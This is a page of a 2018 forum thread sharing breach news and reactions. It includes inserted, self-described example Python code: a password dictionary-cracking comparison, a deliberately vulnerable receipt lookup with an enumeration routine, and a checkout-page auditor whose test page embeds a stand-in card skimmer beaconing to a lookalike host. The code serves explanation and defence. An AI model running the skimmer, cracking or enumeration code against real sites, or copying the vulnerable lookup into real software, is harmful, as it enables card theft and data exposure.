Page 14 of 20

Re: The Data Breach Thread

Posted: Tue Jun 05, 2018 4:21 pm
by Isgrimnur
MyHeritage
MyHeritage, an Israeli-based genealogy and DNA testing company, disclosed today that a security researcher found on the Internet a file containing the email addresses and hashed passwords of more than 92 million of its users.

MyHeritage says it has no reason to believe other user data was compromised, and it is urging all users to change their passwords. It says sensitive customer DNA data is stored on IT systems that are separate from its user database, and that user passwords were “hashed” — or churned through a mathematical model designed to turn them into unique pieces of gibberish text that is (in theory, at least) difficult to reverse.

MyHeritage did not say in its blog post which method it used to obfuscate user passwords, but suggested that it had added some uniqueness to each password (beyond the hashing) to make them all much harder to crack.
...
MyHeritage’s repeated assurances that nothing related to user DNA ancestry tests and genealogy data was impacted by this incident are not reassuring. Much depends on the strength of the hashing routine used to obfuscate user passwords.

Thieves can use open-source tools to crack large numbers of passwords that are scrambled by weaker hashing algorithms (MD5 and SHA-1, e.g.) with very little effort. Passwords jumbled by more advanced hashing methods — such as Bcrypt — are typically far more difficult to crack, but I would expect any breach victim who was using Bcrypt to disclose this and point to it as a mitigating factor in a cybersecurity incident.
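The point Krebs makes above, that the hashing scheme decides what a leaked password file is worth, and the "uniqueness added to each password" (which reads as a per-record salt), can be shown directly. The following is an added example, not code from the original post or from MyHeritage, whose actual scheme is not stated. The users, passwords and wordlist are constructed, and because bcrypt is not in the Python standard library, PBKDF2-HMAC-SHA256 from hashlib stands in for the salted, deliberately slow scheme. The same offline dictionary attack is run against three dumps and the work the attacker pays is counted.

```python
"""How much an offline dictionary attack costs against three password-storage schemes.

Added example; not code from the original post or from MyHeritage, whose
actual scheme is not stated. The users, passwords and wordlist are
constructed. bcrypt is not in the Python standard library, so PBKDF2-HMAC-SHA256
from hashlib stands in as the salted, deliberately slow scheme.
"""
import hashlib
import hmac
import os

# Constructed data: three users and the attacker's (tiny) wordlist.
USERS = {"alice": "sunshine", "bob": "letmein", "carol": "Tr0ub4dor&3"}
WORDLIST = ["123456", "password", "qwerty", "letmein", "dragon", "sunshine", "welcome1"]
PBKDF2_ITERATIONS = 50_000  # work factor; production values are tuned per deployment


def md5_unsalted(password, salt=b""):
    """Scheme 1: fast hash, no salt (salt is accepted and ignored on purpose)."""
    return hashlib.md5(password.encode()).hexdigest()


def sha1_salted(password, salt):
    """Scheme 2: still a fast hash, but prefixed with a per-record random salt."""
    return hashlib.sha1(salt + password.encode()).hexdigest()


def pbkdf2_salted(password, salt):
    """Scheme 3: salted and slow; every guess costs PBKDF2_ITERATIONS HMAC calls."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS).hex()


def make_dump(hasher, salt_len):
    """Simulate the leaked file: one (salt, digest) pair per user."""
    dump = []
    for password in USERS.values():
        salt = os.urandom(salt_len) if salt_len else b""
        dump.append((salt, hasher(password, salt)))
    return dump


def crack_unsalted(dump, hasher=md5_unsalted):
    """No salt: hash the wordlist once, then every leaked digest is a dictionary lookup.
    Cost is len(WORDLIST) hash calls no matter how many records leaked."""
    table = {hasher(word, b""): word for word in WORDLIST}
    cracked = {digest: table[digest] for _, digest in dump if digest in table}
    return cracked, len(WORDLIST)


def crack_salted(dump, hasher):
    """Salted: no shared table is possible, so each record is attacked separately.
    Cost is up to len(dump) * len(WORDLIST) hash calls."""
    cracked, guesses = {}, 0
    for salt, digest in dump:
        for word in WORDLIST:
            guesses += 1
            if hmac.compare_digest(hasher(word, salt), digest):
                cracked[digest] = word
                break
    return cracked, guesses


def compare_schemes():
    """Run the same attack against all three dumps.
    Returns {scheme: (accounts_cracked, primitive_calls_paid_by_attacker)}."""
    results = {}
    cracked, work = crack_unsalted(make_dump(md5_unsalted, 0))
    results["md5_unsalted"] = (len(cracked), work)
    cracked, work = crack_salted(make_dump(sha1_salted, 16), sha1_salted)
    results["sha1_salted"] = (len(cracked), work)
    cracked, work = crack_salted(make_dump(pbkdf2_salted, 16), pbkdf2_salted)
    results["pbkdf2_salted"] = (len(cracked), work * PBKDF2_ITERATIONS)
    return results


if __name__ == "__main__":
    for scheme, (hits, cost) in compare_schemes().items():
        print(f"{scheme:14s} cracked {hits}/{len(USERS)} for {cost:>10,} primitive calls")
```

The attacker cracks the same two weak passwords in every case; what changes is the cost column. Without a salt the wordlist is hashed once for the whole 92-million-row file. A salt forces one full pass per record, and a slow function multiplies each of those guesses by its work factor, which is the mitigating factor Krebs expects a bcrypt user to point to.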

Re: The Data Breach Thread

Posted: Tue Jun 05, 2018 6:11 pm
by Carpet_pissr
Ticketfly

In May 2018, the website for the ticket distribution service Ticketfly was defaced by an attacker and was subsequently taken offline. The attacker allegedly requested a ransom to share details of the vulnerability with Ticketfly but did not receive a reply and subsequently posted the breached data online to a publicly accessible location. The data included over 26 million unique email addresses along with names, physical addresses and phone numbers.

Re: The Data Breach Thread

Posted: Thu Jun 07, 2018 10:16 pm
by Moliere
Facebook Changed 14 Million People’s Privacy Settings to “Public” Without Warning
Facebook disclosed Thursday that a software bug may have switched some users’ posts to “public” without telling them. That means that status updates, photos, and other Facebook activity that people thought they were sharing just with their friends, or with friends of friends, would have instead been viewable by anyone—unless they noticed the settings change and fixed it.

The bug affected 14 million users around the world, Facebook told Recode and other news outlets. It was active for 10 days, from May 18 to May 27, before being fixed. Facebook said Thursday it has begun notifying those affected and prompting them to review their posts and privacy settings from that time period.

Re: The Data Breach Thread

Posted: Fri Jun 08, 2018 10:21 am
by Lorini
Given the stuff I post on FB, I'd have known it right away.

Re: The Data Breach Thread

Posted: Tue Jul 10, 2018 12:49 pm
by Pyperkub
D-Link code signing certificates for ip cameras:
In a support announcement, D-Link officials said that two separate code-signing certificates were recently misappropriated by a “highly active cyber espionage group.” The post said most D-Link customers won’t be affected by the theft, but it also suggested some people may experience errors when viewing mydlink IP cameras within Web browsers. Company engineers are in the process of releasing updated firmware to fix the errors. People using mydlink mobile applications aren’t affected.

Both D-Link and Changing Information Technology have revoked the stolen certificates. Until the D-Link firmware is issued, the company’s support announcement is advising people who want to use browsers to view their affected D-Link cameras to temporarily ignore the certificate revocation warnings. This is bad advice that could be abused by malware operators. Users should disregard it.
If you use the D-Link mydlink IP Cameras, keep an eye out for official firmware updates.

Re: The Data Breach Thread

Posted: Wed Aug 15, 2018 12:33 am
by Max Peck
The hits keep on coming...

'Foreshadow' attack affects Intel chips
Researchers have found another serious security flaw in computer chips designed by Intel.

Nicknamed Foreshadow, this is the third significant flaw to affect the company’s chips this year.

The US government’s body for computer security said “an attacker could exploit this vulnerability to obtain sensitive information”.

Intel has released a patch which mitigates the problem, which affects processors released from 2015 onwards.
The most recent cumulative update for Windows 10, released yesterday, appears to address this issue.

Re: The Data Breach Thread

Posted: Tue Sep 18, 2018 10:23 am
by Isgrimnur
GovPayNow.com
Government Payment Service Inc. — a company used by thousands of U.S. state and local governments to accept online payments for everything from traffic citations and licensing fees to bail payments and court-ordered fines — has leaked more than 14 million customer records dating back at least six years, including names, addresses, phone numbers and the last four digits of the payer’s credit card.

Indianapolis-based GovPayNet, doing business online as GovPayNow.com, serves approximately 2,300 government agencies in 35 states. GovPayNow.com displays an online receipt when citizens use it to settle state and local government fees and fines via the site. Until this past weekend it was possible to view millions of customer records simply by altering digits in the Web address displayed by each receipt.
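"Altering digits in the Web address" is the textbook insecure direct object reference. The following is an added example, not GovPayNet's code: a receipt lookup that behaves the way the article describes, beside a hardened version, with a small routine that does what the reporter did and counts how many records each one gives up. The receipts, e-mail addresses and the pay.example URLs are constructed.

```python
"""Receipt lookup by a guessable number (the GovPayNow pattern) beside a hardened version.

Added example; not GovPayNet's code. The receipts, e-mail addresses and the
pay.example URLs are constructed.
"""
import secrets
from urllib.parse import parse_qs, urlparse

# Constructed receipts, stored under a sequential number as the naive system does.
RECEIPTS = {
    1001: {"payer": "alice@example.com", "name": "Alice Example", "last4": "4242", "amount": "125.00"},
    1002: {"payer": "bob@example.com", "name": "Bob Example", "last4": "1881", "amount": "60.00"},
}


def _query_param(url, key):
    """First value of ?key=... in the URL, or None."""
    return parse_qs(urlparse(url).query).get(key, [None])[0]


def vulnerable_receipt(url, session_user):
    """Insecure direct object reference: the record is chosen by the number in the
    URL and session_user is never consulted, so changing the digits reads someone
    else's receipt."""
    rid = _query_param(url, "id")
    if rid is None or not rid.isdigit():
        return None
    return RECEIPTS.get(int(rid))


# Hardened version: receipts are addressed by an unguessable token AND the
# lookup checks that the requester is the payer.
TOKENS = {}  # token -> receipt number


def issue_receipt_link(rid):
    """Mint the link the payer sees after paying."""
    token = secrets.token_urlsafe(24)  # 192 random bits; cannot be enumerated
    TOKENS[token] = rid
    return f"https://pay.example/receipt?t={token}"


def hardened_receipt(url, session_user):
    rid = TOKENS.get(_query_param(url, "t"))
    if rid is None:
        return None
    record = RECEIPTS[rid]
    if record["payer"] != session_user:  # a leaked or shared link still is not authorization
        return None
    return record


def enumerate_receipts(lookup, first, last, session_user="attacker@example.com"):
    """What the reporter did: walk the digits in the URL and count what comes back."""
    found = 0
    for rid in range(first, last + 1):
        if lookup(f"https://pay.example/receipt?id={rid}", session_user) is not None:
            found += 1
    return found


if __name__ == "__main__":
    print("vulnerable:", enumerate_receipts(vulnerable_receipt, 1000, 1010), "records read")
    print("hardened:  ", enumerate_receipts(hardened_receipt, 1000, 1010), "records read")
    link = issue_receipt_link(1001)
    print("owner:", hardened_receipt(link, "alice@example.com")["last4"])
    print("other:", hardened_receipt(link, "bob@example.com"))
```

The random token only stops enumeration; the ownership check is what makes the receipt private once a link is forwarded or logged. On a payment site with no accounts, where there is no session_user to compare against, the token is the whole authorization and should be short-lived as well as unguessable.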

Re: The Data Breach Thread

Posted: Thu Sep 20, 2018 12:22 am
by Carpet_pissr
Newegg

Hackers stole customer credit cards in Newegg data breach

"Newegg is clearing up its website after a month-long data breach.

Hackers injected 15 lines of card skimming code on the online retailer’s payments page which remained for more than a month between August 14 and September 18, Yonathan Klijnsma, a threat researcher at RiskIQ, told TechCrunch. The code siphoned off credit card data from unsuspecting customers to a server controlled by the hackers with a similar domain name — likely to avoid detection. The server even used an HTTPS certificate to blend in.

The code also worked for both desktop and mobile customers — though it’s unclear if mobile customers are affected."
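The skimmer described above lived in inline script on the payment page and sent card data to a lookalike host over HTTPS. The following is an added example, not Newegg's or RiskIQ's code, of the check a defender would run over a checkout page: collect every host the page talks to, flag anything off the allow-list (with lookalikes of the brand called out), and flag inline script that both reads card fields and reaches such a host. The two pages, host names and allow-list are constructed, and the injected script is a stand-in for the real 15-line skimmer, not a copy of it.

```python
"""Auditing a checkout page for an injected card skimmer (the Newegg pattern).

Added example; not Newegg's or RiskIQ's code. The pages, host names and
allow-list are constructed, and the injected script is a stand-in for the
real skimmer, not a copy of it.
"""
import re
from urllib.parse import urlparse

BRAND = "shop"                                    # what a lookalike domain would imitate
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example"}
CARD_FIELDS = ("cardNumber", "cvv", "expiry")     # field names on the constructed form

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
# Inline <script> bodies only (tags that carry src= are skipped).
INLINE_SCRIPT_RE = re.compile(r"<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>", re.S | re.I)

PAGE_CLEAN = """<html><body>
<form id="payment" action="https://shop.example/checkout/pay">
  <input name="cardNumber"><input name="cvv"><input name="expiry">
</form>
<script src="https://cdn.shop.example/js/checkout.js"></script>
</body></html>
"""

# Constructed stand-in for the injected skimmer: reads the card fields on submit
# and beacons them to a lookalike host under the attacker's control.
SKIMMER = """<script>
document.getElementById("payment").addEventListener("submit", function () {
  var d = btoa(document.querySelector("[name=cardNumber]").value + "|" +
               document.querySelector("[name=cvv]").value);
  new Image().src = "https://shop-stats.example/collect?d=" + d;
});
</script>
"""
PAGE_SKIMMED = PAGE_CLEAN.replace("</body>", SKIMMER + "</body>")


def hosts_in(text):
    """Every host name that appears in an http(s) URL inside the text."""
    return {urlparse(u).hostname for u in URL_RE.findall(text)} - {None}


def classify_host(host):
    """None if the host is expected, otherwise why it is suspicious."""
    if host in ALLOWED_HOSTS:
        return None
    return "lookalike-host" if BRAND in host else "unknown-host"


def audit_checkout_page(html):
    """Return sorted (host, reason) findings for a checkout page.

    Two checks: any URL pointing off the allow-list, and, more specifically,
    inline script that both touches card fields and talks to such a host."""
    findings = set()
    for host in hosts_in(html):
        reason = classify_host(host)
        if reason:
            findings.add((host, reason))
    for body in INLINE_SCRIPT_RE.findall(html):
        if not any(field in body for field in CARD_FIELDS):
            continue
        for host in hosts_in(body):
            if classify_host(host):
                findings.add((host, "card-field-exfil"))
    return sorted(findings)


def csp_for(allowed_hosts):
    """A Content-Security-Policy that would have blocked the beacon above:
    img-src and connect-src only permit the allow-listed origins."""
    origins = " ".join(sorted(f"https://{h}" for h in allowed_hosts))
    return (f"default-src 'self'; script-src 'self' {origins}; "
            f"connect-src 'self' {origins}; img-src 'self' {origins}; "
            f"form-action 'self' {origins}")


if __name__ == "__main__":
    print("clean:  ", audit_checkout_page(PAGE_CLEAN))
    print("skimmed:", audit_checkout_page(PAGE_SKIMMED))
    print(csp_for(ALLOWED_HOSTS))
```

A valid HTTPS certificate on the exfiltration host, as in the article, does nothing against this check, because it keys on where the page sends data rather than on whether the transport is encrypted. The CSP the last function emits is the preventive counterpart: a beacon to a host outside img-src or connect-src is refused by the browser before any card data leaves the page.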

Re: The Data Breach Thread

Posted: Thu Sep 20, 2018 10:07 am
by RMC
Carpet_pissr wrote: Thu Sep 20, 2018 12:22 am Newegg

Hackers stole customer credit cards in Newegg data breach

"Newegg is clearing up its website after a month-long data breach.

Hackers injected 15 lines of card skimming code on the online retailer’s payments page which remained for more than a month between August 14 and September 18, Yonathan Klijnsma, a threat researcher at RiskIQ, told TechCrunch. The code siphoned off credit card data from unsuspecting customers to a server controlled by the hackers with a similar domain name — likely to avoid detection. The server even used an HTTPS certificate to blend in.

The code also worked for both desktop and mobile customers — though it’s unclear if mobile customers are affected."
I picked the wrong time to order a new video card from New Egg. Canceled my credit card and am having them send a new one.

Re: The Data Breach Thread

Posted: Fri Sep 21, 2018 5:16 pm
by Isgrimnur
Krebs
It is now free in every U.S. state to freeze and unfreeze your credit file and that of your dependents, a process that blocks identity thieves and others from looking at private details in your consumer credit history. If you’ve been holding out because you’re not particularly worried about ID theft, here’s another reason to reconsider: The credit bureaus profit from selling copies of your file to others, so freezing your file also lets you deny these dinosaurs a valuable revenue stream.

Enacted in May 2018, the Economic Growth, Regulatory Relief and Consumer Protection Act rolls back some of the restrictions placed on banks in the wake of the Great Recession of the last decade. But it also includes a silver lining. Previously, states allowed the bureaus to charge a confusing range of fees for placing, temporarily thawing or lifting a credit freeze. Today, those fees no longer exist.
...
Spouses may request freezes for each other by phone as long as they pass authentication.

The new law also makes it free to place, thaw and lift freezes for dependents under the age of 16, or for incapacitated adult family members. However, this process is not currently available online or by phone, as it requires parents/guardians to submit written documentation (“sufficient proof of authority”), such as a copy of a birth certificate and copy of a Social Security card issued by the Social Security Administration, or — in the case of an incapacitated family member — proof of power of attorney.

Re: The Data Breach Thread

Posted: Fri Sep 21, 2018 10:50 pm
by Kraken
I paid to freeze mine a few months ago. Can I now unfreeze them for free?

Re: The Data Breach Thread

Posted: Fri Sep 21, 2018 10:51 pm
by Isgrimnur
Supposedly.

Re: The Data Breach Thread

Posted: Sat Sep 22, 2018 12:06 am
by Carpet_pissr
You shouldn’t have had to pay to unfreeze anyway, AFAIK. Just freeze (for just one in my case, others were free to freeze)

Re: The Data Breach Thread

Posted: Sat Sep 22, 2018 11:59 am
by Lorini
Yeah I gotta get mine frozen again now, just to piss off the credit card companies if for no other reason.

Re: The Data Breach Thread

Posted: Sat Sep 22, 2018 5:26 pm
by Max Peck
RCMP and privacy commissioner probe alleged NCIX data breach
The RCMP and Office of the Information and Privacy Commissioner of British Columbia are investigating allegations of a possible data breach involving the bankrupt computer retailer NCIX.

Authorities are investigating a claim that NCIX's database servers have been advertised for sale online with all of the information still intact.

In doing so, it may have compromised the security of countless customers.

According to a statement from Richmond RCMP, the case was opened Thursday and police have seized the servers.
The author Travis Doering is a systems analyst who says he noticed a Craigslist ad listing NCIX computers for sale.

Doering says he arranged to meet the seller, a man who called himself Jeff, in a warehouse in Richmond. He says he was stunned when the man offered the information from offline backup servers on millions of transactions.

"Every record for more than 10 years was there."

He says he saw personal data of customers, including addresses, phone numbers and financial information.

"Credit card information was there in plain text with numbers, CVVs [Card Verification Value] and expiry dates," Doering said.

He also saw personal income tax information about employees such as T4 statements. He showed some of the statements to CBC News.
Technically I'm affected by this (I ordered a part from them about 10 years ago) but the credit card number I had back then is no longer valid, so meh.

Re: The Data Breach Thread

Posted: Sun Sep 23, 2018 7:30 am
by Lorini
This is why there needs to be laws protecting consumer information. That's pretty ridiculous. Not to mention one does wonder how Visa/MC/Amex would feel about this.

Re: The Data Breach Thread

Posted: Wed Sep 26, 2018 8:00 pm
by Moliere
Not really a data breach, but everything Facebook does comes across that way:

Facebook Is Giving Advertisers Access to Your Shadow Contact Information

Re: The Data Breach Thread

Posted: Thu Sep 27, 2018 7:57 am
by Carpet_pissr
Yeah, FB is pretty much a data breach itself as far as I’m concerned.

Re: The Data Breach Thread

Posted: Fri Sep 28, 2018 8:03 pm
by Moliere
Carpet_pissr wrote: Thu Sep 27, 2018 7:57 am Yeah, FB is pretty much a data breach itself as far as I’m concerned.
FB delivers!

Security Update
On the afternoon of Tuesday, September 25, our engineering team discovered a security issue affecting almost 50 million accounts. We’re taking this incredibly seriously and wanted to let everyone know what’s happened and the immediate action we’ve taken to protect people’s security.

Our investigation is still in its early stages. But it’s clear that attackers exploited a vulnerability in Facebook’s code that impacted “View As” a feature that lets people see what their own profile looks like to someone else. This allowed them to steal Facebook access tokens which they could then use to take over people’s accounts. Access tokens are the equivalent of digital keys that keep people logged in to Facebook so they don’t need to re-enter their password every time they use the app.

Re: The Data Breach Thread

Posted: Wed Oct 03, 2018 2:39 pm
by Exodor
Burgerville
On August 22, 2018, the Federal Bureau of Investigation (FBI) notified Burgerville of a cybersecurity breach impacting a number of the company’s systems. The breach was perpetrated by Fin7 and was a sophisticated attack targeting companies with locations in the Pacific Northwest. Burgerville agreed to cooperate fully with the FBI investigation, and immediately began a forensic investigation of its own to determine the full extent of the breach.

On September 19, 2018, as part of its forensics investigation, Burgerville discovered that the breach, which was initially thought to be a brief intrusion, was still active. The group of hackers had placed malware on Burgerville’s network and were continuing to collect payment data. Burgerville immediately began taking steps to contain the breach and disable the malware with the help of a third-party team of cybersecurity experts and in cooperation with the FBI.

I can't even get a tasty milkshake without having my credit card number stolen. :doh:

Re: The Data Breach Thread

Posted: Wed Oct 03, 2018 2:40 pm
by Isgrimnur
[Image: map of Burgerville locations, from their website]

[Image]

Re: The Data Breach Thread

Posted: Wed Oct 03, 2018 2:41 pm
by Exodor
Isgrimnur wrote: Wed Oct 03, 2018 2:40 pm

Really?

:mrgreen:

Re: The Data Breach Thread

Posted: Wed Oct 03, 2018 2:45 pm
by Isgrimnur
Exodor wrote: Wed Oct 03, 2018 2:41 pm
Isgrimnur wrote: Wed Oct 03, 2018 2:40 pm

Really?

:mrgreen:
The map above is from their website with their locations. But thanks for the thoughts. :D

Re: The Data Breach Thread

Posted: Thu Oct 04, 2018 4:38 pm
by hitbyambulance
Burgerville had some decent vegetarian burgers, actually. I'd go back there.

Re: The Data Breach Thread

Posted: Thu Oct 04, 2018 4:47 pm
by Isgrimnur
hitbyambulance wrote: Thu Oct 04, 2018 4:38 pm Burgerville had some decent vegetarian burgers, actually. i'd go back there.
Use cash.

Re: The Data Breach Thread

Posted: Mon Oct 08, 2018 6:02 pm
by Blackhawk
How about... Google?

Oh, and they're shutting down Google+ in response.

Re: The Data Breach Thread

Posted: Mon Oct 08, 2018 7:36 pm
by Exodor
Blackhawk wrote: Mon Oct 08, 2018 6:02 pm Oh, and they're shutting down Google+ in response.
Oh no! Dozens of Google+ users will be forced to go elsewhere! :wink:

Re: The Data Breach Thread

Posted: Wed Oct 17, 2018 12:10 am
by Moliere
Kind of a data breach depending on how you view privacy at work.

The Employer-Surveillance State
Jason Edward Harrington spent six years working the luggage-screening checkpoint at O’Hare International Airport in Chicago. A college graduate and freelance writer, he initially took the job as a stopgap, but found that he enjoyed meeting passengers from all over the world, some of whom showed a real interest in him. But while working for the TSA, Harrington noticed that his bosses were following and video-recording his every move, a practice they said was at least in part for his protection: If, perchance, a traveler’s iPad went missing, the videotapes would prove that Harrington was not to blame. Harrington was on board with that. His problem, he told me, was that supervisors would also view the tapes to search for the slightest infraction—anything from gum chewing to unauthorized trips to the bathroom. Eventually, these intrusions led him to quit. “If they trusted us, respected us, you could really enjoy the job,” Harrington told me. “But they didn’t.”

A TSA spokesman, Michael McCarthy, acknowledged the agency’s use of surveillance, though he attributed the “fairly rapid” turnover rate of TSA baggage screeners to other factors—in particular, to “low pay and high stress.” In fact, electronic surveillance of employees, through technologies including not just video cameras but also monitoring software, has grown rapidly across all industries. Randolph Lewis, a professor of American studies at the University of Texas at Austin and the author of Under Surveillance: Being Watched in Modern America, pointed to software that makes it possible for employers to monitor employee facial expressions and tone of voice to gauge their emotional states, such as rage or frustration. Among more conventional surveillance methods, employers can track employees’ website visits and keep tabs on their employees’ keystrokes. Employers can also monitor employees’ personal blogs and read their social-networking profiles. In one case in California, a sales executive at a money-transfer firm sued her employer, claiming she had been fired for disabling an app that used employer-issued cell phones to track workers via GPS, even when they were off the clock. (The suit was later settled out of court.)

Re: The Data Breach Thread

Posted: Wed Oct 17, 2018 7:59 am
by Isgrimnur
If only there were a way for workers to band together to negotiate what is and isn’t acceptable for employers to use such information.

Re: The Data Breach Thread

Posted: Wed Oct 17, 2018 9:57 am
by Blackhawk
That doesn't surprise me much. That's what working in casinos was like clear back in the 90s. They told me on day one that unless I was in the bathroom I should assume that one of several thousand video cameras was looking over my shoulder.

Re: The Data Breach Thread

Posted: Wed Oct 17, 2018 11:09 am
by Lorini
Sometimes I wish I were still working, but it's crap like that that reminds me of why I'm not.

Re: The Data Breach Thread

Posted: Wed Oct 17, 2018 11:14 am
by stimpy
Lorini wrote: Wed Oct 17, 2018 11:09 am Sometimes I wish I were still working, but it's crap like that that reminds me of why I'm not.
Does, Not. Compute.

Re: The Data Breach Thread

Posted: Wed Oct 17, 2018 11:36 am
by gilraen
Blackhawk wrote: Wed Oct 17, 2018 9:57 am That doesn't surprise me much. That's what working in casinos was like clear back in the 90s. They told me on day one that unless I was in the bathroom I should assume that one of several thousand video cameras was looking over my shoulder.
Casinos are a special case, though, since you are literally surrounded by cash floating around and changing hands all day long.

I work in tech support, and if I were told that my employer was going to measure my keystrokes or otherwise monitor what I'm doing all day long, I'd quit. I will not put up with that kind of disrespect, if you don't trust me to do my work, then I'll go somewhere else.

We do, however, have video surveillance cameras over the office entrances - since we deal with medical PII, we are required to implement physical security measures to protect the data, not just cyber security.

Re: The Data Breach Thread

Posted: Wed Oct 17, 2018 2:16 pm
by hitbyambulance
gilraen wrote: Wed Oct 17, 2018 11:36 am and if I were told that my employer was going to measure my keystrokes or otherwise monitor what I'm doing all day long, I'd quit. I will not put up with that kind of disrespect, if you don't trust me to do my work, then I'll go somewhere else.
But what if they _don't_ tell you? That, I think, is the big problem here.

Re: The Data Breach Thread

Posted: Wed Oct 17, 2018 2:45 pm
by Lorini
stimpy wrote: Wed Oct 17, 2018 11:14 am
Lorini wrote: Wed Oct 17, 2018 11:09 am Sometimes I wish I were still working, but it's crap like that that reminds me of why I'm not.
Does, Not. Compute.
I am disabled and not able to work at the job I had, that's all. My income dropped by 70%, so yeah I do wish sometimes that I was still working, but I'm sure that this extensive video surveillance is going on where I used to work, so maybe not.

Re: The Data Breach Thread

Posted: Wed Oct 17, 2018 9:39 pm
by Blackhawk
gilraen wrote: Wed Oct 17, 2018 11:36 am
Blackhawk wrote: Wed Oct 17, 2018 9:57 am That doesn't surprise me much. That's what working in casinos was like clear back in the 90s. They told me on day one that unless I was in the bathroom I should assume that one of several thousand video cameras was looking over my shoulder.
Casinos are a special case
Absolutely they are, but I would think the TSA (the example quoted above) would qualify for that distinction as well, given that it is A) security related, and B) particularly prone to claims of theft/misconduct/abuse.

Re: The Data Breach Thread

Posted: Fri Nov 02, 2018 8:23 pm
by Moliere
Intel CPUs impacted by new PortSmash side-channel vulnerability
Researchers have classified PortSmash as a side-channel attack. In computer security terms, a side-channel attack describes a technique used for leaking encrypted data from a computer's memory or CPU, which works by recording and analyzing discrepancies in operation times, power consumption, electromagnetic leaks, or even sound to gain additional info that may help break encryption algorithms and recover the CPU's processed data.

Researchers say PortSmash impacts all CPUs that use a Simultaneous Multithreading (SMT) architecture, a technology that allows multiple computing threads to be executed simultaneously on a CPU core.

In lay terms, the attack works by running a malicious process next to legitimate ones using SMT's parallel thread running capabilities. The malicious PortSmash process then leaks small amounts of data from the legitimate process, helping an attacker reconstruct the encrypted data processed inside the legitimate process.

Re: The Data Breach Thread

Posted: Fri Nov 30, 2018 12:29 pm
by Carpet_pissr
Marriott

Marriott reveals data breach of 500 million Starwood guests

Marriott says its guest reservation system has been hacked, potentially exposing the personal information of approximately 500 million guests.

The hotel chain said Friday the hack affects its Starwood reservation database, a group of hotels it bought in 2016 that includes the St. Regis, Westin, Sheraton and W Hotels.
Marriott said hackers had gained "unauthorized access" to the Starwood reservation system since 2014, but the company only identified the issue last week.
"The company recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it," Marriott said in a statement.
For 327 million people, Marriott says the guests' exposed information includes their names, phone numbers, email addresses, passport numbers, date of birth and arrival and departure information. For millions of others, their credit card numbers and card expiration dates were potentially compromised.

Re: The Data Breach Thread

Posted: Fri Nov 30, 2018 1:22 pm
by Z-Corn
Carpet_pissr wrote: Fri Nov 30, 2018 12:29 pm Marriott

Marriott reveals data breach of 500 million Starwood guests

Marriott says its guest reservation system has been hacked, potentially exposing the personal information of approximately 500 million guests.

The hotel chain said Friday the hack affects its Starwood reservation database, a group of hotels it bought in 2016 that includes the St. Regis, Westin, Sheraton and W Hotels.
Marriott said hackers had gained "unauthorized access" to the Starwood reservation system since 2014, but the company only identified the issue last week.
"The company recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it," Marriott said in a statement.
For 327 million people, Marriott says the guests' exposed information includes their names, phone numbers, email addresses, passport numbers, date of birth and arrival and departure information. For millions of others, their credit card numbers and card expiration dates were potentially compromised.
I'm pretty sure I had a phishing attempt come my way last week due to this. The combination of data that the phisher had was unique to my Marriott account from about this period of time. This is the upside of providing phony data to companies that don't need real data.

Re: The Data Breach Thread

Posted: Fri Nov 30, 2018 5:36 pm
by Skinypupy
Goddammit...I just got a new credit card number due to some suspicious activity.

Looks like it's time for round two.